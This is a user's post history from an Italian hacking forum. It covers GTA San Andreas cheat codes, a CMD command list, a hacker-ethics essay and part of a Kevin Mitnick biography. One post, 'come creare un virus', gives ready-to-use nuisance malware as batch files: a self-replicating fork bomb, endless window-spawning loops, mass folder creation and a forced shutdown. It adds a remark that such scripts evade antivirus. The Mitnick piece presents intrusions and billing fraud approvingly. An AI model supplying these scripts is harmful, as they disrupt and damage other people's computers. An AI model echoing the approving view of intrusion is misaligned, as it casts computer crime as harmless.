HACKING 120% {Hacking, programmazione, computer & molto altro}

Posts written by Wet Water

view post Posted: 7/3/2011, 20:38     Trucchi GTA sant Andreas per PC - Videogame
Tutti i codici qui sotto riportati sono stati testati e risultano funzionanti, si sconsiglia comunque l'uso di questi codici in quanto potrebbero influenzare il corretto svolgimento del gioco.
Utilizzate questi codici esclusivamente se non avrete altre soluzioni possibili per passare una missione.

Per attivare i trucchi effettuate la corretta sequenza di pulsanti, se il trucco sarà corretto apparirà un messaggio. Per disattivarli basterà ripetere la sequenza di pulsanti da premere (non tutti possono essere disattivati).

Ci sono 86 trucchi in questa pagina

Generale
Effetto Trucco
Vita, armatura e 250.000 $ HESOYAM
Aumenta al massimo la vita e l'armatura aggiungendo inoltre 250.000 $ al proprio patrimonio. Se questo trucco viene inserito mentre si è all'interno di un qualsiasi veicolo danneggiato, questo verrà riparato e riportato in perfette condizioni.

Vita infinita BAGUVIX
Rendi CJ quasi a prova di proiettile, ignifugo e immune agli attacchi corpo a corpo. Non potrai però sopravvivere alle esplosioni, cadute dall'alto, investimenti o annegamenti.

Suicidio GOODBYECRUELWORLD
Uccidi CJ quando non avrai ulteriori possibilità.

Modalità adrenalina ANOSEONGLASS
Rallenta il gioco e fornisce a Carl una forza strepitosa che gli permetterà di uccidere con due soli pugni.

Ossigeno infinito (abilità apnea) CVWKXAM
Nuota sott'acqua senza mai preoccuparti di prendere aria per non rischiare di affogare.

Mai affamato AEDUWNV
Disattiva il sistema di nutrizione di CJ, permettendogli, non solo di non morire per denutrizione, ma di non perdere più peso o massa muscolare.

Muscoli e grasso al minimo KVGYZQK
Azzera la barra Muscoli e Grasso, rendendo CJ estremamente magro e fragile.

Grasso al massimo BTCDBCB
Aumenta la barra Grasso al massimo, rendendo CJ obeso.

Muscoli al massimo BUFFMEUP
Aumenta la barra Muscoli al massimo, rendendo CJ estremamente muscoloso

Azzera livello di sospetto TURNDOWNTHEHEAT
Rimuove tutte le stelle dal livello di sospetto attuale.

Aumenta livello di sospetto TURNUPTHEHEAT
Aumenta di 2 stelle il livello di sospetto attuale.

Livello di sospetto a sei stelle BRINGITON
Aumenta il livello di sospetto al massimo, cosicché CJ sarà ricercato dalla polizia, FBI ed esercito. Trucco consigliato a quelli che amano il rischio e l'avventura.

Mai ricercato AEZAKMI
Bloccherà il livello di sospetto. Puoi liberamente fare ciò che vuoi senza che i poliziotti ti inseguano o disturbino. Gli agenti di polizia si comporteranno come dei normali pedoni (purtroppo armati). E' consigliato attivare questo trucco quando non si hanno stelle, in quanto non sarà possibile rimuovere il livello di sospetto attuale.

Statistiche veicoli al massimo NATURALTALENT
Aumenta al massimo le abilità di guida di auto, aerei, moto e bici

Resistenza al massimo VKYPQCF
Aumenta al massimo la barra Resistenza di CJ.

Sex appeal al massimo HELLOLADIES
Aumenta al massimo la barra Sex appeal di CJ.

Rispetto al massimo WORSHIPME
Aumenta al massimo la barra Rispetto di CJ.

Super pugno mortale IAVENJQ
Rende i pugni e i calci talmente potenti da far fuori una persona con un solo colpo. Bisogna però stare attenti perchè anche i pedoni sono dotati di questa capacità.

Super salto KANGAROO
CJ può saltare 10 volte più alto di prima. Bisogna stare attenti alla caduta, se l'altezza sarà esagerata si perderà della salute.

Beach Party LIFESABEACH
CJ in pantaloncini e sandali, ragazze in costume da bagno, gente che prende il sole ovunque e veicoli da mare in giro per la città.

Funhouse CRAZYTOWN
Sostituisce i pedoni con commessi di fast food e clown, le auto con Hotknife, Baggage, Tug, Hotdog, MR. Whoopee, Pizzaboy, BF Injection, Caddy e Quadbike (la maggior parte di questi avranno le sospensioni idrauliche). CJ indosserà boxer a cuori, occhiali buffi e capelli rosa.

Modalità Ninja NINJATOWN
Tutti i pedoni vengono sostituiti con membri del Mountain Cloud Boys (gang della triade di San Fierro) armati di Katana. I veicoli saranno sostituiti da PCJ-600, BF-400 e FCR-900 di colore nero. CJ sarà armato di Katana

Modalità sadomaso BEKKNQV
Tutti i pedoni verranno sostituiti con papponi e prostitute armate di vibratori e falli di gomma. CJ sarà vestito da sadomaso, cosa che attirerà tutte le prostitute in zona. Due tipi di vibratori, non utilizzabili normalmente nel gioco, compariranno con questo trucco.

Elvis è vivo BLUESUEDESHOES
Tutti i pedoni verranno sostituiti da imitatori di Elvis Presley.

Modalità caos STATEOFEMERGENCY
Rivolta dei pedoni, proprio come succede nelle ultime missioni del gioco. Gli edifici vanno a fuoco, la gente scappa rubando TV e altri oggetti, i veicoli esplodono e si creano risse per la strada.

Attacco dai pedoni BAGOWPG
Tutti i pedoni seguono CJ con l'intenzione di pestarlo e ucciderlo. Questo trucco non può essere disattivato.

Attacco dai pedoni (armati) BGLUAWML
Tutti i pedoni saranno armati e seguiranno CJ con l'intenzione di ucciderlo. Questo trucco non può essere disattivato.

Pedoni armati FOOOXFT
Tutti i pedoni saranno forniti di armi che utilizzeranno solo per difendersi.

Rivolta dei pedoni AJLOJYQY
I pedoni saranno armati di qualsiasi tipo di arma e si spareranno contro. Questo trucco non può essere disattivato.

Arruola chiunque nella tua gang (9mm) SJMAHPE
Arruola qualsiasi pedone nella tua gang creando un piccolo e potente esercito. Le reclute, appena arruolate, se non saranno provviste di un arma verranno automaticamente equipaggiate di una 9mm.

Arruola chiunque nella tua gang (lanciarazzi) ROCKETMAYHEM
Arruola qualsiasi pedone nella tua gang creando un piccolo e potente esercito. Le reclute, appena arruolate, se non saranno provviste di un arma verranno automaticamente equipaggiate di un lanciarazzi.

Gang ovunque ONLYHOMIESALLOWED
Le gang della OGF, dei Ballas e dei Vagos compariranno per tutto lo stato di San Andreas. I membri delle gang guideranno auto solitamente usate dai pedoni. Inoltre per le strade gireranno anche Taxi con tassisti ben armati.

Tutte le gang al controllo della strada BIFBUZZ
Disattiva il traffico e i pedoni lasciando nelle strade solo le gang di tutta San Andreas (Ballas, Vagos, Los Aztecas, Mafia, Triade, Da Nang Boys, Rifa, ecc.). Consigliato a quelli che amano le guerre e la confusione

Rallenta gioco SLOWITDOWN
Rallenta l'intero gioco. Per rimuovere l'effetto e ripotare tutto alla normalità sarà necessario inserire il trucco "Velocizza gioco"

Velocizza gioco SPEEDITUP
Velocizza l'intero gioco. Per rimuovere l'effetto e rirpotare tutto alla normalità sarà necessario inserire il trucco "Rallenta gioco".


Armi
Effetto Trucco
Armi #1 LXGIWYL
Set di armi 1: Nocche d"acciaio, Mazza da baseball, 9mm, Fucile a pompa, Micro SMG, AK-47, Fucile semi-automatico, Lanciarazzi, Molotov, Bomboletta spray.

Armi #2 PROFESSIONALSKIT
Set di armi 2: Coltello, Desert Eagle, Fucile a canne mozze, Tec-9, M4, Fucile di precisione, Lanciafiamme, Granate, Estintore.

Armi #3 UZUMYMW
Set di armi 3: Motosega, 9mm silenziata, Fucile da combattimento, SMG, M4, Fucile di precisione, Lanciarazzi a ricerca termica, Eplosivi.

Paracadute AIYPWZQP
CJ sarà in possesso di un paracadute.

Livello Killer in tutte le armi PROFESSIONALKILLER
Aumenta le statistiche di abilità con le armi al livello "Killer" permettendo quindi l'utilizzo di due armi contemporaneamente, un raggio d"azione più esteso, spostamenti laterali e altro ancora. Le armi sono: Pistola, Pistola silenziata, Desert Eagle, Fucile, Fucile a canne mozze, Fucile da combattimento, Pistola mitragliatrice, SMG, AK-47 e M4.

Munizioni infinite FULLCLIP
Blocca il numero di munizioni disponibili per ogni arma, rendendole infinite.


Condizioni atmosferiche e tempo
Effetto Trucco
Sereno PLEASANTLYWARM
Modifica il tempo rendendo il cielo più limpido e sereno.

Soleggiato TOODAMNHOT
Tempo soleggiato e afoso.

Nuvoloso ALNSFMZO
Copre il cielo di nuvole rendendolo molto chiaro.

Nebbioso CFVFGMJ
Aggiunge la nebbia creando un'atmosfera tetra.

Temporale SCOTTISHSUMMER
Modifica il tempo con pioggia, tuoni e fulmini.

Tempesta di sabbia CWJXUOC
Attiva una tempesta di sabbia, tipica del deserto di San Andreas

Tempo più veloce YSOHNUL
Velocizza l'orologio di San Andreas: un'ora del gioco corrisponderà a due secondi reali.

Orario bloccato alle 21:00 OFVIAC
Blocca l'orologio alle 21:00 di sera. Se CJ viene arrestato o eliminato, l'orario rimarrà fermo alle 9:00 di mattina.

Orario bloccato a mezzanotte NIGHTPROWLER
Blocca l'orologio a mezzanotte. Se CJ viene arrestato o eliminato, l'orario rimarrà fermo a mezzogiorno.


Prestazioni veicoli e traffico
Effetto Trucco
Guida instabile STICKLIKEGLUE
Velocizza le auto e rende la sterzata molto sensibile, sarà quindi facile cappottare. Premendo il tasto "H" inoltre le auto salteranno, anzichè suonare il clacson.

Nitro in tutte le auto SPEEDFREAK
Inserisce il Nitro (NOS) in tutti i veicoli (tranne moto e bici) che può essere attivato con la semplice pressione del tasto "CTRL" quando si è all'interno del mezzo.

Auto volanti CHITTYCHITTYBANGBANG
Ogni veicolo (tranne moto e bici) potrà volare poichè la manovrabilità sarà identica a quella degli aerei.

Auto galleggianti in aria BUBBLECARS
Per far galleggiare in aria qualsiasi veicolo, basterà colpirlo con un'auto. Questo trucco puo' essere usato per raggiungere il limite d'altezza massimo. Se invece amate il paracadutismo, colpite con la vostra auto un elicottero per farlo galleggiare in aria, ed entrate subito a bordo prima che voli via, una volta entrati potrete raggiungere qualsiasi altezza.

Veicoli invisibili WHEELSONLYPLEASE
Tutti i veicoli da strada (tranne moto e bici) diventano invisibili mostrandone solo le ruote e le persone all'interno del veicolo.

Veicoli neri IOWDLAC
Tutti i veicoli diventano di colore nero.

Veicoli rosa LLQPFBN
Tutti i veicoli diventano di colore rosa.

Veicoli sportivi EVERYONEISRICH
Sostituisce il traffico con auto rare e sportive (come la Turismo, Hotknife, Banshee e altre). Queste auto saranno inoltre più veloci.

Veicoli di campagna FVTMNBZ oppure BMTPWHR
Sostituisce il traffico con veicoli solitamente visti nelle zone campestri: Freeway, Wayfarer, Sanchez, Journey, Walton, Linerunner, Tanker, Trattori, Rancher, Blade e Ranger della polizia (esistono due sequenze di pulsanti diverse con lo stesso effetto)

Veicoli scadenti EVERYONEISPOOR
Sostituisce il traffico con veicoli utilizzati solitamente dalle persone povere di San Andreas.<

Traffico aggressivo YLTEICZ
Nessun veicolo si fermerà e ci saranno più inseguimenti tra gente e polizia.

Traffico e pedoni ridotti GHOSTTOWN
Le strade e i marciapiedi saranno quasi senza auto e pedoni.

Semafori sempre verdi ZEIIVG
Tutti i semafori saranno sempre verdi.

Mirare e sparare mentre si guida OUIQDMW
Si potrà mirare e sparare mentre si guida un auto, proprio come fanno i membri della gang di CJ quando vengono arruolati e sparano dai veicoli.

Super Bunny hop CJPHONEHOME
CJ ha l'abilità di effettuare incredibili salti ("Bunny hop") in BMX oltre 30 metri di altezza.

Veicoli mortali JCNRUAD
Qualsiasi veicolo sta usando CJ diventa invulnerabile e acquisisce l'abilità tipica del carro armato di distruggere all'istante qualsiasi cosa urta. Questo trucco viene applicato a qualsiasi tipo di veicolo, dalle auto alle moto e persino le bici BMX

Distruggi tutti i veicoli CPKTNWT
Attivando questo trucco tutti i veicoli nelle vicinanze esploderanno. E' consigliato uscire da qualsiasi tipo di veicolo prima di inserire questo trucco se non si vuole perire nell'esplosione del veicolo stesso.

Barche volanti FLYINGFISH
Con questo trucco attivo tutte le barche decolleranno dopo aver raggiunto una certa velocità.


Comparsa veicoli
Effetto Trucco
Tanker (Autobotte) AMOMHRER
Questo trucco fa comparire un Tanker completo di cisterna di benzina.

Bloodring Banger OLDSPEEDDEMON
Vecchia auto utilizzata nello stadio di San Fierro.

Caddy RZHSUEW
Golf Cart a due posti.

Dozer ITSALLBULL
Bulldozer dotato di pala meccanica grazie alla quale è possibile liberare la strada con facilità

Hotring Racer #1 VROCKPOKEY
Auto da corsa dello stadio di Los Santos.

Hotring Racer #2 VPJTQWV
Auto da corsa dello stadio di Los Santos.

Hunter OHDUDE
L'Hunter è l'elicottero militare dell'esercito di San Andreas, è dotato di lanciamissili e mitragliatore.

Hydra JUMPJET
L'Hydra è un Fighter Jet molto potente a decollo verticale, utile per raggiungere in poco tempo luoghi molto distanti.

Jetpack ROCKETMAN
Questo trucco fa comparire un Jetpack, il "veicolo" speciale che si ottiene dopo aver completato la missione "Green Goo" affidata da The Truth.

Monster Truck MONSTERMASH
Enorme jeep con ruote spropositate, utile per "attraversare" il traffico o fare acrobazie.

Quadbike FOURWHEELFUN
Moto a due posti e quattro ruote adatto a qualsiasi terreno.

Rancher JQNTDMH
Fuoristrada che è possibile trovare nelle zone campestri o nel deserto

Rhino AIWPRTON
Carro armato dell'esercito di San Andreas distruttivo e quasi indistruttibile.

Romero WHERESTHEFUNERAL
Questo trucco fa comparire un carro funebre, occasionalmente con una bara all'interno.

Stretch CELEBRITYSTATUS
Questo trucco fa comparire una limousine di lusso.

Stuntplane FLYINGTOSTUNT
L'aereo Stuntplane è utile per effettuare qualche acrobazia in aria.

Trashmaster TRUEGRIME
Questo trucco fa comparire un camion della spazzatura.

Vortex KGGGDKP
Hovercraft (veicolo a cuscino d'aria) che può essere utilizzato sia sulla terraferma che in acqua.




view post Posted: 7/3/2011, 09:26     come creare un virus - Bat e vbs
Come ho già spiegato questi codici si scrivono sul blocco note e poi si salva tutto in .bat esempio Pincopallino.bat

1
CODICE
@echo off
start
start
start
start
start
start


questo codice aprirà per tante volte quant' è scritto start il cmd. Io consiglio di scriverloc ome minimo più di 300 volte


2
CODICE
@echo off
:1
start
GoTo :1


questo codice, praticamente infinito, infatti appena si arriverà a " GoTo :1 " il processo ritornerà a " :1"


3
CODICE
start nome.bat


questo è infinito e si aprira infinitamente intasando il cpu, il virus ovviamente dovrà avere lo stesso nome di quanto scritto nel virus

4
CODICE
@ echo off
start itunes.exe
start cmd
start word.exe
start notepad
start PROCESSI CHE VOLETE


Con questo codice potrete aprire tutti i processi cetehe volete

5
CODICE
@echo off
Md ciao
Md prila
Md con\
Md fregato
Md nome che volete


In questo codice si puo' usare il GoTo questo aprirà molte e molte cartelle chiamte con il nome scritto

6
CODICE
@echo off
MD %­random%-%­random%


con questo aprirete un numero di cartelle con un determinato nome anche qui puo' essere usato il GoTo

7
CODICE
@echo off
echo scemo
echo prila
echo ti distruggero il computer
SHUTDOWN -s -t 03 -c muhahahaah
echo 3
echo 2
echo 1
echo addio
MD fregato
MD aahahaahaah


con questo scriverete alcune cose sullo sfondo cmd farete partire lo spegnimento del cpu e creerete due cartelle
se volete annullare lo shutdown bassterà aggiungere un " shutdown -a alla fine del testo


ORA PROVATE A MODIFICARLI MA NON LAMERATE

se i virus non sono abbastanza complessi l'antivirus non li riconoscerà
ricordo che il bat non è un virus ma è solo una programmazione che impartisca comandi al sistema
Se avete problemi non esitate a postare

Edited by (!_!) - 6/5/2011, 20:01
view post Posted: 5/3/2011, 09:59     CMD tutti i comandi - Bat e vbs
Per ulteriori informazioni su uno specifico comando, digitare HELP nome comando


CODICE
ASSOC Visualizza o modifica le applicazioni associate alle estensioni dei file.
AT Pianifica l'esecuzione di comandi o programmi su un computer.
ATTRIB Visualizza o cambia gli attributi di un file.
BREAK Attiva o disattiva il controllo esteso di CTRL+C.
CACLS Visualizza o modifica gli elenchi di controllo di accesso (ACL) dei file.
CALL Richiama un programma batch da un altro.
CD Visualizza il nome o cambia la directory corrente.
CHCP Visualizza o imposta il numero di tabella codici attiva.
CHDIR Visualizza il nome o cambia la directory corrente.
CHKDSK Controlla un disco e visualizza il relativo rapporto sullo stato.
CHKNTFS Visualizza o modifica la verifica di un disco durante l'avvio.
CLS Cancella lo schermo.
CMD Avvia una nuova istanza dell'interprete dei comandi di Windows.
COLOR Imposta i colori predefiniti in primo piano e dello sfondo della console.
COMP Confronta il contenuto di due file o di un gruppo di file.
COMPACT Visualizza o modifica la compressione di file su partizioni NTFS.
CONVERT Converte volumi FAT in NTFS. Non Š possibile convertire
l'unit… in uso.
COPY Copia uno o pi— file in un'altra posizione.
DATE Visualizza o imposta la data.
DEL Elimina uno o pi— file.
DIR Visualizza un elenco di file e sottodirectory in una directory.
DISKCOMP Confronta i contenuti di due dischi floppy.
DISKCOPY Copia il contenuto di un disco floppy su un altro.
DOSKEY Modifica righe di comando, richiama comandi di Windows, crea macro.
ECHO Visualizza messaggi o attiva e disattiva l'eco dei comandi.
ENDLOCAL Termina la localizzazione di modifiche di ambiente in un file batch.
ERASE Elimina uno o pi— file.
EXIT Termina il programma CMD.EXE (interprete dei comandi).
FC Confronta due file o gruppi di file e visualizza le differenze tra di
essi.
FIND Ricerca una stringa di testo in un file o file.
FINDSTR Ricerca stringhe in file.
FOR Esegue un comando specificato per ogni file in un gruppo di file.
FORMAT Formatta un disco per l'utilizzo con Windows.
FTYPE Visualizza o modifica i tipi di file utilizzati nelle associazioni delle estensioni di file.
GOTO Dirige l'interprete dei comandi di Windows a una riga con etichetta
in un programma batch.
GRAFTABL Abilita Windows alla visualizzazione di un set di caratteri estesi in
modalit… grafica.
HELP Fornisce informazioni di aiuto per i comandi di Windows.
IF Esegue un'elaborazione condizionale in un programma batch.
LABEL Crea, cambia o elimina l'etichetta di volume di un disco.
MD Crea una directory.
MKDIR Crea una directory.
MODE Configura una periferica di sistema.
MORE Visualizza l'output una schermata alla volta.
MOVE Sposta uno o pi— file da una directory a un'altra directory.
PATH Visualizza o imposta un percorso di ricerca per file eseguibili.
PAUSE Sospende l'elaborazione di un file batch e visualizza un messaggio.
POPD Ripristina il valore precedente della directory corrente salvato con PUSHD.
PRINT Stampa un file di testo.
PROMPT Cambia il prompt dei comandi di Windows.
PUSHD Salva la directory corrente e poi la cambia.
RD Elimina una directory.
RECOVER Recupera le informazioni leggibili da un disco danneggiato o difettoso.
REM Registra commenti (note) in file batch o CONFIG.SYS.
REN Rinomina i file.
RENAME Rinomina i file.
REPLACE Sostituisce i file.
RMDIR Elimina una directory.
SET Visualizza, imposta o elimina variabili di ambiente di Windows.
SETLOCAL Inizia la localizzazione di modifiche di ambiente in un file batch.
SHIFT Modifica la posizione di parametri sostituibili in file batch.
SORT Ordina l'input.
START Avvia una finestra separata per eseguire un programma o un comando specificato.
SUBST Associa un percorso ad una lettera di unit….
TIME Visualizza o imposta l'ora di sistema.
TITLE Imposta il titolo della finestra per una sessione CMD.EXE.
TREE Visualizza graficamente la struttura delle directory di un'unit… o percorso.
TYPE Visualizza il contenuto di un file di testo.
VER Visualizza la versione di Windows.
VERIFY Comunica a Windows di verificare o meno che i file siano stati
scritti correttamente su un disco.
VOL Visualizza un'etichetta di volume e il numero di serie del disco.
XCOPY Copia file e strutture di directory.


Comunque se li volete avere sul computer basta andare su esegui -> cmd e scrivere help >c:/comandidos.txt e poi andate in risorse del computer e poi in disco locale c: e li trovate il file comandidos.txt


Edited by (!_!) - 6/5/2011, 20:05
view post Posted: 4/3/2011, 21:19     Etica hacker - Definizioni
ATTEGGIAMENTO DI UN HACKER

Gli Hackers risolvono i problemi e costruiscono le cose, credono nella libertà e nel mutuo aiuto volontario. Per essere accettato come un hacker, ti devi comportare come se avessi questo atteggiamento nel sangue. E per comportarti come se avessi questo atteggiamento nel sangue, devi realmente credere nel tuo comportamento.
Se pensi a coltivare un atteggiamento da hacker giusto per essere accettato nella hacker-culture, allora non hai capito. Diventare il tipo di persona che crede in queste cose è importante per te- per aiutarti ad imparare e per avere delle motivazioni. Come con tutte le arti creative, la via più efficace per diventere un maestro è imitare al forma mentis dei maestri - non solo intellettualmente ma anche emotivamente.

Ebbene, se vuoi essere un hacker ripeti le cose seguenti fino a che non le credi veramente:

1.Il mondo è pieno di problemi affascinanti che aspettano di essere risolti.
Essere un hacker è molto divertente, ma è un tipo di divertimento che richiede molto sforzo. Lo sforzo necessita di motivazioni. Gli atleti di successo trovano le loro motivazioni da una specie di gusto nell'usare i loro corpi oltre i limiti del fisico. Similmente, per essere un hacker devi provare i brividi nel risolvere problemi, affilare le tue capacità, ed esercitare la tua intelligenza.
Se non sei il tipo di persona che per natura prova queste sensazioni, allora dovrai diventarci, se vuoi farcela ad essere un Hacker. Altrimenti vedrai che le energie spese per fare l'hacker saranno fiaccate da distrazioni come il sesso, i soldi e l'essere riconosciuti nella società.

(Inoltre devi anche sviluppare una specie di fede nelle tue capacità di apprendimento - una fede grazie alla quale, pur non conoscendo tutto ciò di cui hai bisogno per risolvere un problema, affrontandone una parte sarai capace imparare abbastanza per risolvere la parte successiva....e così via, fino a che ce la fai).


2. Nessuno dovrebbe mai risolvere lo stesso problema una seconda volta
. Le menti creative sono una risorsa valida e limitata. Esse non dovrebbero essere sprecate nel reinventare la ruota quando ci sono così tanti e affascinanti problemi che aspettano là fuori.
Per comportarsi come un hacker, devi credere che il tempo che gli altri hackers spendono a pensare sia prezioso - a tal punto che è quasi un dovere morale condividere informazioni, risolvere problemi e diffonderne la soluzione cosicchè gli altri hackers possono risolvere nuovi problemi invece di dover riaffrontare perpetuamente quelli vecchi.

(Non devi credere di essere obbligato a dare via tutti i tuoi prodotti creativi, sebbene gli hackers che lo fanno iano quelli che sono più rispettati dagli altri. E' coerente coi valori dell'hacker "vendere" un po' del suo prodotto per riuscire a sbarcare il lunario ed avere un computer. E' coerente pure usare le proprie capacità per mantenere una famiglia o addirittura diventare ricchi, fermo restando che non devi mai dimenticare di essere un hacker mentre lo fai.)


3. La noia e i lavori "da sgobboni" sono un male. Gli hackers (ed in generale le persone creative) non dovrebbero mai annoiarsi o aver a che fare con dei lavori ripetitivi, faticosi e stupidi, perchè quando questo accade significa che non stanno facendo ciò che solo loro possono fare: risolvere nuovi problemi. Questo spreco danneggia tutti. Perciò la noia ed i lavori ingrati non sono semplicemente sgradevoli, ma un male vero e proprio.
Per comportarti come un hacker, devi crederci abbastanza da voler automatizzare tutte le cianfrusaglie noiose il più possibile, non solo per te ma per qualsiasi altra persona (in particolar modo gli altri hackers).

(Apparentemente c'è solo un eccezione. Gli hackers dovranno fare talvolta cose che possono sembrare ripetitive ad un osservatore, ma che servono per chiarire le idee, per acquisire delle nuove capacità o per fare delle esperienze che non possono essere fatte altrimenti. Tuttavia questa è una tua scelta - nessuno capace di pensare dovrebbe essere mai forzato alla noia).


4. La libertà è un bene.Gli hackers sono per natura anti-autoritari. Chiunque ha il potere di darti ordini ha pure il potere di fermarti dal risolvere un qualsiasi problema da cui sei affascinato - e, conoscendo in che modo lavorano le menti autoritarie, in linea di massima troverà una ragione incredibilmente stupida per farlo. Quindi un atteggiamento autoritaio deve essere combattuto ovunque si trovi, per paura che soffochi te e gli altri hackers.
(Questo, però, non significa combattere tutte le autorità. I babmbini hanno bisogno di essere guidati e i criminali corretti. Un hacker potrebbe essere d'accordo nell'accettare un qualche tipo di autorità per ottenerre qualcosa che desidera di più del tempo che impiega ad eseguire gli ordini. Ma questo è un compromesso limitato e di cui si è coscienti; il tipo di persona arrendevole che gli autoritari desiderano non deve venir offerta).

Gli autoritari si sviluppano grazie alla censura ed ai segreti. Essi non confidano nella cooperazione volontaria e nella condivisione di informazioni - a loro piace siol la cooperazione che possono controllare. Quindi per comportarti come un hacker, devi sviluppare un ostilità istintiva verso la censura, la segretezza, e l'uso della forza e dell'inganno per costringere gli adulti responsabili. E devi essere disposto ad agire in base a questo credo.


5. L'atteggiamento non sostituisce la competenza.
Per essere un hacker devi sviluppare alcuni di questi atteggiamenti. Ma coltivarne uno solo non ti renderà certo un hacker, non più di quanto ti possa rendere un grande atleta od una rock star. Per diventare un hacker c'è bisogno dell'intelligenza, la pratica, di dedicarsi ed infine di lavorare sodo.
Quindi devi imparare a non fidarti di un atteggiamento competente di qualsiasi tipo. Gli hackers di certo non perderanno tempo con chi si spara le pose, poichè hanno il culto della competenza - soprattutto competenza nell'hacking, ma va bene la competenza in qualsiasi cosa. In particolar modo è ottima una competenza in alcune capacità che pochi hanno, ancora megli se sono capacità quali una mente brillante, astuzia e concentrazione.


Se anche tu veneri la competenza, ti divertirai a svilupparla in te - e il lavoro duro e la dedizione diventeranno una specie di gioco intenso piuttosto che una noia. E questo è vitale per essere un hacker.

PCLAB
view post Posted: 4/3/2011, 21:06     Kevin David Mitnick - News dal mondo informatico
La storia infinita di Kevin David Mitnick, l'hacker più famoso del mondo, sotto processo negli Stati Uniti. E' in carcere da quattro anni e gli è stata respinta ogni richiesta di libertà su cauzione. 1. This is the End…my only friend, the End... E' il 14 febbraio del 1995, giorno di San Valentino. In una cittadina americana sta accadendo qualcosa che scatenerà ribellioni, dimostrazioni, appelli via rete, la nascita di siti spontanei di contro-informazione, la creazione di una colletta per realizzare un fondo spese legali... Arriva un camioncino blu, un Van, con la scritta Sprint Telecomunications. Dal Van esce un giapponese, due tecnici della Sprint, le forze speciali dell'FBI con giubbotti antiproiettile ed armi alla mano. Sembra di vedere un film di azione. Ma non è così. A Raleigh, piccolo centro nello Stato del North Carolina, stanno per arrestare Kevin Mitnick.

Le conseguenze di questo arresto saranno molteplici e non solo per le comunità underground ed hacker.. Iniziata nel 1981 con l'attacco da parte di Kevin, allora diciassettenne, ai sistemi Cosmos della Pacific Bell (compagnia telefonica americana), la “caccia all'uomo” dell'FBI si conclude nel 1995, dopo 14 anni. Centosessantotto mesi di appostamenti, intercettazioni, false piste, arresti mancati. Il 14 febbraio si arriva alla conclusione di una lunga corsa, un inseguimento interminabile attraverso le reti di mezzo mondo. Quel giorno nasce il mito di Kevin Mitnick, l'hacker più famoso al mondo. 2. Gli inizi Kevin nasce in California. I suoi genitori divorziano quando lui ha appena 3 anni. Nella sua adolescenza rispecchia lo stereotipo classico dell'hacker: a 13 anni è un ragazzino solitario, grassotello. Inizia con i “CB”, a 8 anni è già radioamatore. Da ex-hacker, interpreto questa sua passione come una ricerca comunicativa: là fuori c'è qualcuno e lui ci vuole parlare, la distanza fisica non è più mportante, a otto anni può dialogare con degli adulti che si trovano in altre città.

Credo che in quel periodo sia nata in lui, forse inconsciamente, la passione per l'hacking, le reti, la comunicazione. Nella più classica immagine americana della prima metà degli anni '70, il ragazzino brufoloso, occhialuto e ciccione ha 9 anni e vagabonda per i negozi di elettronica della sua città, prende pezzi usati, li ricicla, costruisce, assembla tecnologia trasmissiva tutto solo nella sua stanzetta, mentre i coetanei giocano a basket o “simply, they are hangin' on around the school” (cazzeggiano davanti alla scuola): diventa cliente assiduo di alcuni negozi, fa amicizia con i proprietari, forse inizia a fare qualche lavoretto da bravo teen-ager americano, ricevendo come paga dell'hardware usato. Il ragazzino cresce, scopre i PC. Va oltre, fin da subito, scoprendo i modem: a 13 anni viene cacciato da scuola dal preside, perché entrava negli archivi degli altri istituti. Trasferisce la bolletta telefonica di un ospedale (30.000 US$) sul conto di uno che detestava. Si battezza Condor, dal film “I tre giorni del Condor”, con Robert Redford. Credo che un alias, un nickname, non sia mai stato più azzeccato: il Condor è solitario, lavora da solo, non si fida di nessuno, vive con la solitudine. E probabilmente Kevin/Condor trova nella Rete e nell'hacking una compagna ideale, un qualcosa che lo rende meno solo. Verso la fine degli anni '70, a 16 anni, come ogni bravo ragazzo americano, prende la patente: la targa della sua auto è X-HACKER. A 17 anni viene arrestato per la prima volta: furto di manuali informatici.

Immagino Kevin, andatura insicura, occhiali da vista spessi, andare a cercare manuali per imparare, per capire dei sistemi informatici ai quali non poteva accedere, a cercare l'informazione. Io facevo trashing (letteralmente, rovistare nella spazzatura; farlo davanti alle sedi di aziende di informatica, università e compagnie di telecomunicazione produce spesso informazioni molto riservate), per trovare i manuali della Digital e imparare a programmare su VAX/VMS. Seguono altri arresti, nell'83, nell'87 e nell'88, sempre per reati informatici. Un giudice di Los Angeles, la signora Mariana Pfaelzer, lo mette in carcere emettendo una condanna superiore a quella richiesta dal D.A (District Attorney, il Pubblico Ministero). Prima di farlo uscire dall'aula, gli dice: “Questa è l'ultima volta che fa una cosa simile, signor Mitnick”.Indubbiamente una frase profetica. Viene successivamente rilasciato, ma gli viene imposto il divieto di svolgere lavori che richiedano 'uso di un personal computer.

Oggi, nel 1999, ad alcuni anni di distanza, quello stesso giudice dovrà decidere se le richieste di risarcimento - presentate damultinazionali informatiche e pari ad un totale di ben ottanta milioni di dollari (sì, avete letto bene: hanno chiesto 80.000.000 US$ di danni al Signor Kevin David Mitnick) - dovranno essere soddisfatte o meno. Buona fortuna, giudice Mariana. Le aziende che hanno richiesto il risarcimento sono la Motorola, la Fujitsu, la Nokia, La Sun Microsystems, la Novell, la Nec. Il solo utile netto della Motorola nel 1995 è stato di 22.247.000.000 di dollari.Con che coraggio queste aziende chiedono ottanta milioni di dollari ad un carcerato sotto processo, il quale non ha fatto altro che copiare delle informazioni per propria cultura personale, senza rivenderle, modificarle o distruggerle? 3. Il “Condor” vola troppo in altoAnni '90. Kevin è cresciuto. E' sempre più Condor.

E' un fantasma, come scrissero in seguito. Non esiste. Vive dirottando i propri conti su altre utenze. Gira gli States, notebook e cellulare modificato. Pone molta attenzione durante le connessioni, cambia spesso numeri telefonici, appartamento. Si sposta di continuo. Esplode, probabilmente, il suo odio verso le “Big Companies”: IBM, Digital, Sun Microsystems, Fujitsu. Tutte hanno dei segreti da custodire. Il Condor cerca la libertà d'informazione. Vuole la verità, vuole i bug, i famosi difetti, errori di programmazione compiuti dalle software house, per poter accedere ai sistemi informatici protetti. Dalla prima metà degli anni '90, sino al suo arresto, Kevin cresce ancora. E' molto attirato dai sistemi VAX della Digital: sono i soli a non avere praticamente bug, a non essere “sfondabili”. Allora il Condor agisce, silenzioso. Utilizza Social Engineering, una tecnica hacking per carpire telefonicamente informazioni spacciandosi per un'altra persona, un collega di una filiale. Ottiene tutto quello che vuole. Viola il sistema di un Internet Provider inglese. A quel sistema è abbonato, come utente regolare, un consulente della Digital. E' stato tra i creatori del VMS, il sistema operativo proprietario dei VAX Digital, ed ora effettua consulenze alla Digital sulla sicurezza. I bug ci sono. Vengono scoperti da quest'uomo.

